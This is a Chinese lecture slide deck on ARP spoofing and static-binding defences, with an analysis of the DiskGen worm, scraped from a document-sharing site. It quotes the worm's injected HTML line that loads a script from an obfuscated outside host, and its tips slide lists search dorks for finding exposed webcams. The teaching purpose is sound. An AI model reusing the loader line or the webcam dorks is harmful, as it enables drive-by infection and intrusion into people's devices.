ARP病毒原理與防御措施课件.pptVIP

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
ARP病毒原理與防御措施课件

ARP病毒原理与防御措施 报告人:刘鑫 目录 什么是ARP ARP协议的漏洞 ARP欺骗原理 Windows与Linux的解决办法 Cookie 什么是ARP ARP (Address Resolution Protocol ) 地址解析协议 作用:IP--?MAC的转换 (什么是MAC?) 简单来说: 任何方式的访问都会事先发一次arp的请求 ARP的工作方式 1.我是A,我的IP是,我的MAC是11:11:11:11:11:11,如果你的ip是,请回答你的MAC 所有的主机都会收到这个请求,不过只有目的主机会做出回答。 2.我的IP是,我的MAC是22:22:22:22:22:22. ARP的工作方式 ARP帧格式 小问题: ARP工作在哪一层?什么是RARP和 IARP? 两种特殊的ARP 代理ARP 从一个网络发送ARP请求时,路由器欺骗主机自己就是目的地。 免费ARP 发给自己的ARP,一般发生在系统引导时,来获得借口的MAC地址。有的系统不支持! ARP协议漏洞 漏洞的根源就是ARP协议是无连接的 没有ARP的请求也可以ARP回复.最致命的就是操作系统收到这个请求后就会更新ARP缓存。 Solaris的特点。 ARP请求也可以伪造。 ARP主机的缓存中毒! ARP的单向欺骗 ARP的中间人攻击 防范措施 由于ARP漏洞是协议的漏洞,不隶属于某个操作系统,所以很难进行防御。 Windows下的措施 arp –s意味着什么? Arp –s 54 00-d0-f8-e3-ba-e9 安装arp防火墙 (360的ARP防火墙不安全) Linux下的措施 (正在研究中) 编辑/etc/ethers Arp –f 这种静态绑定在DHCP环境下无法工作! 磁碟机病毒分析 症状: 杀毒软件运行不了 必须全盘格式化才能完全清楚病毒 刚重新装的系统又中毒了 病毒名称: 磁碟机病毒 病毒名称英文:Worm.DiskGen 病毒类型:感染型 危险级别:★★★☆ 传播方式:U盘 受影响的系统: Windows 2000, XP, 2003 未受影响的系统:Windows 3.x, Unix, Linux?? 1 破坏本机杀毒软件运行,删除本机杀毒软件服务、驱动等。 2 感染本机 .exe, .htm, .html, .js, .rar, .zip文件。 3 释放DLL文件,注册COM组件,弹出广告,下载其他病 毒、木马。 4 中毒后系统无法进入安全模式、组策略功能也被禁用。 磁碟机病毒分析 在html文件尾中加入 document.write(“ ScRiPt src=http://%6A%73%2E%6B%30%31%30%32%2E%63%6F%6D/%30%31%2E%61%73%70 /sCrIpT “); Decode后 document.write(ScRiPt src=/01.asp /sCrIpT); 磁碟机病毒分析 多种传播方法的结合体: U盘传播 正确的磁盘打开方式 Arp传播 开启ARP防火墙 破环安全模式 修复 破坏进程查看工具 通过权限破环U盘免疫 Some Cookies Google的使用技巧 1 imgtype=face 只搜索人脸 2 inurl:web 3 filetype:pdf web 4 site: 网络中心 5 在线摄像头 sample/LvAppl 、 control/userimage Some Cookies 把桌面放到D盘 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders 防止由于系统崩溃导致重要文件丢失 谢谢! 祝李老师一路顺风 * * * * *

文档评论(0)

1234554321 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档